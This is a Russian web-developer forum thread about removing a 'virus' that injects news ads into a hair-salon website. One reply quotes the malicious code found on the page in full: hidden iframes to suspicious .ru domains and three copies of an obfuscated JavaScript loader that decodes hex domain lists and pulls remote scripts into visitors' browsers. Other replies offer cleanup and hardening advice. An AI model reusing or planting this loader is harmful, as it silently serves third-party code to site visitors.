Форум Сайтостроение Безопасность

Как избавиться от вируса на сайте

12
W
На сайте с 18.01.2013
Offline
45
webakkord
2372

Доброго времени суток! На сайте появился вирус, показывающий какие то новости в левой части сайта. Скрин проблемы в приложении. Как удалить это "чудо"? В коде ошибок не обнаружил.

png 150670.png
XO
На сайте с 28.05.2015
Offline
24
X-Oleg
#1

Уверены что дело в сайте ? Либо удалили уже ?

А походил по Вашему сайту, нет никакой рекламы ! Может у вас в браузере адварь какая ?

Исследование защиты и информационная безопасность (https://ru-sf.ru/)
aklimovv
На сайте с 18.01.2008
Offline
224
aklimovv
#2

Это в браузере, поставили чего-то, она (программа) и доставила. Антивирус не найдёт, смотрите в браузере какие-то левые расширения или плагины и отключайте их.

W
На сайте с 18.01.2013
Offline
45
webakkord
#3
aklimovv:
Это в браузере, поставили чего-то, она (программа) и доставила. Антивирус не найдёт, смотрите в браузере какие-то левые расширения или плагины и отключайте их.

Дело в том, что эта дребедень на 4 разных компах выявляется... Я думаю не может быть такого совпадения...

XO
На сайте с 28.05.2015
Offline
24
X-Oleg
#4

Сейчас ещё раз глянул, да по этому адресу появилось:http://salon-hair.ru/dnevnik-direktora

Во время прокрутки страницы, в коде страницы куча ифреймов, вот: 

<iframe style="display: none;" src="http://rakxjt4c.ru/f.html" width="320" height="240"></iframe>

<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salon-hair.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]></script>

<iframe style="display: none;" src="http://rakxjt4c.ru/f.html" width="320" height="240"></iframe>

<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["34676d696d7839373269707267722e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salon-hair.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]></script>

<iframe style="display: none;" src="http://h9o2svlvxl58.ru/f2.html?a=14945" width="320" height="240"></iframe>

<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["34676d696d7839373269707267722e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salon-hair.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]></script>

Просмотрите возможно какой кривой плагин установили, или ещё что, реклама появляется не на всех страницах...:)

Кнопка «пожаловаться» появилась во В Google Картинках появилось Яндекс запустил автоматическую ленту
L
На сайте с 20.02.2006
Offline
92
Linkator
#5

Сейчас при взломе часто стали ставить коды, которые срабатывают только при заходе на страницу из поисковых систем. Обратите на это внимание.

big boy
На сайте с 18.11.2006
Offline
332
big boy
#6

Я просто оставлю это здесь - https://revisium.com

Ребята помогли мне, когда уже сам перепробовал все способы + сделали железобетонную защиту на будущее.

✔ Как я генерирую статьи через ИИ, которые приносят трафик - https://webmasta.ru/blog/16-vkalyvayut-roboty-ne-chelovek-stati-s-pomoschyu-ii-kotorye-prinosyat-trafik
XO
На сайте с 28.05.2015
Offline
24
X-Oleg
#7
big boy:
+ сделали железобетонную защиту на будущее.

Что за защита такая ?

Железобетонная защита - Это нанять нормального админа, либо самому следить и ставить патчи к софту, также не ставить всякие кривые скрипты и плагины к CMS !

Вот и весь секрет !

А всякие там Web Application Firewall и т.д., лишь от школоты, хотя тоже не повредят конечно, если есть возможность...:)

Яндекс раскрывает секреты борьбы Секреты индексации динамических страниц Распространённые ошибки веб-мастеров при
big boy
На сайте с 18.11.2006
Offline
332
big boy
#8
X-Oleg:
Что за защита такая?

Настроили .htaccess, чтобы исключить всевозможные инъекции в урлах, ограничили доступ к уязвимым местам по IP, исправили права файлов и папок, удалили в комментариях кода пометки скриптов и CMS, чтобы было сложнее понять версию и многое другое.

Естественно это не даёт 100% гарантию, но с тех пор не было ни одного взлома (прошло уже несколько лет).

Google вебмастерам о безопасности Google выделил $3 миллиона Яндекс.Вебмастер уведомит об обнаруженных
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#9
big boy:
удалили в комментариях кода пометки скриптов и CMS,

Это сделали в ревизиуме?😮 Не ожидал от них такого.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
big boy
На сайте с 18.11.2006
Offline
332
big boy
#10
SeVlad:
Это сделали в ревизиуме?😮 Не ожидал от них такого.

А что плохого в том, что они удалили название CMS, версию CMS и некоторые другие совершенно никому не особо нужные пометки?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий